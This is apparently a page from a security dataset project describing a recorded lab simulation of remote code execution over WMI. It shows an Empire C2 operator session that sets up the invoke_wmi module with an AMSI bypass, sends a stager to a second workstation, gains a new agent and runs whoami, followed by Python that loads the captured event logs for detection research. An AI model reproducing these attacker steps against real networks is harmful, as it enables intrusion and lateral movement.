Empire Invoke WMI#

Metadata#

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/21

Modification Date

2020/09/22

Tactics

TA0002,TA0008

Techniques

T1047

Tags

WMI IWbemServices ExecMethod

Dataset Description#

This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Simulation Metadata#

Tools#

type

Name

Module

C2

Empire

lateral_movement

Adversary View#

(Empire: agents) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-21 04:06:27  http            

(Empire: agents) > interact AWTK7BX5
(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > set Listener http
(Empire: powershell/lateral_movement/invoke_wmi) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_wmi) > info

              Name: Invoke-WMI
            Module: powershell/lateral_movement/invoke_wmi
        NeedsAdmin: False
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @harmj0y

Description:
  Executes a stager on remote hosts using WMI.

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        AWTK7BX5                  Agent to run module on.                 
  CredID           False                                 CredID from the store to use.           
  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma 
                              cal                       separated.                              
  Listener         False       http                      Listener to use.                        
  Command          False                                 Custom command to run.                  
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  UserName         False                                 [domain\]username to use to execute     
                                                        command.                                
  Password         False                                 Password to use to execute command.     
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/lateral_movement/invoke_wmi) > execute
[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT
[*] Agent AWTK7BX5 tasked with task ID 3
[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_wmi
(Empire: powershell/lateral_movement/invoke_wmi) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent EHUNP61R checked in
[+] Initial agent EHUNP61R from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to EHUNP61R at 172.18.39.6

(Empire: powershell/lateral_movement/invoke_wmi) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-21 04:14:58  http            
EHUNP61R ps 172.18.39.6     WORKSTATION6      *THESHIRE\pgustavo      powershell         9804   5/0.0    2020-09-21 04:14:56  http            

(Empire: agents) > interact EHUNP61R
(Empire: EHUNP61R) > shell whoami
[*] Tasked EHUNP61R to run TASK_SHELL
[*] Agent EHUNP61R tasked with task ID 1
(Empire: EHUNP61R) > 
theshire\pgustavo

..Command execution completed.

(Empire: EHUNP61R) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)